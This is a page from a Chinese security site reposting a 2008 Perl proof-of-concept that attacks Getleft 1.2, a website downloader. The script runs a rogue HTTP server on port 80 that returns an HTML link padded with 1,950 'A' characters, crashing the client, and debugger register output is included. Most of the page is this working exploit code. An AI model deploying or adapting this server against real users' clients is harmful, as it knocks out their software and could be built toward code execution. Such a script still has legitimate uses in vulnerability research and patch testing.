首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Getleft 1.2 Remote Buffer Overflow Proof of Concept
来源:www.vfcocus.net 作者:Koshi 发布时间:2008-12-24  
#!/usr/bin/perl
#
# Getleft v1.2.0.0 DoS PoC
# Author: Koshi
#
# Application: Getleft v1.2
# Publisher: Andres Garcia ( http://personal1.iddeo.es/andresgarci/getleft/english/index.html )
# Description: Website Downloader, for such things as offline browsing.
# Tested On: Windows XP SP2
#
# Module: Getleft.exe
# eax=00c5f170 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00c5f170
# eip=004863eb esp=0022d9b0 ebp=010b4870 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
#
# Getleft+0x863eb:
# 004863eb 8b06            mov     eax,dword ptr [esi]  ds:0023:00000000=????????
#
# <embed src=>, <img src=>, <script src=>, <body background=>
# Plenty of other tags will work as well. I'm not so sure about
# code execution, I'll have to try a few other things.
#

use IO::Socket;

my $body = "<a href=\x22/abcd.jpg\x22>" ."A"x1950 ."</a>";
my $resp = "".
"HTTP/1.1 200 OK\r\n".
"Server: Apache\r\n".
"Date: Mon, 22 Dec 2008 21:50:46 GMT\r\n".
"Content-Type: text/html\r\n".
"Accept-Ranges: bytes\r\n".
"Last-Modified: Mon, 22 Dec 2008 21:45:46 GMT\r\n".
"Content-Length: " .length($body) ."\r\n".
"Connection: close\r\n\r\n".
"$body\r\n";

for ($i = 2; $i >= 1; $i--) {

my $sock = new IO::Socket::INET (LocalPort => '80',
Proto => 'tcp',
Listen => 1,
Reuse => 1, );

print "Listening...\n";
my $new_sock = $sock->accept();
print "Connected...\n";
my $sock_addr = recv($new_sock,$msg,190,0);
print "Sending ...\n";
print $new_sock "$resp";
print "Sent!\n";
close($sock);
print "Closed.\r\n\r\n";

}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CMS NetCat 3.12 (password_reco
·Google Chrome Browser (ChromeH
·RoundCube Webmail <= 0.2b Remo
·FreeSSHD 1.2.1 (Post Auth) Rem
·CMS NetCat 3.12 (password_reco
·Exploits FreeSSHd Multiple Rem
·PGP Desktop 9.0.6 (PGPwded.sys
·Psi Jabber Client (8010/tcp) R
·Mozilla Firefox 3.0.5 location
·Oracle Pwnage Part 6 from DBA
·CUPS < 1.3.8-4 (pstopdf filter
·BulletProof FTP Client 2.63 Lo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved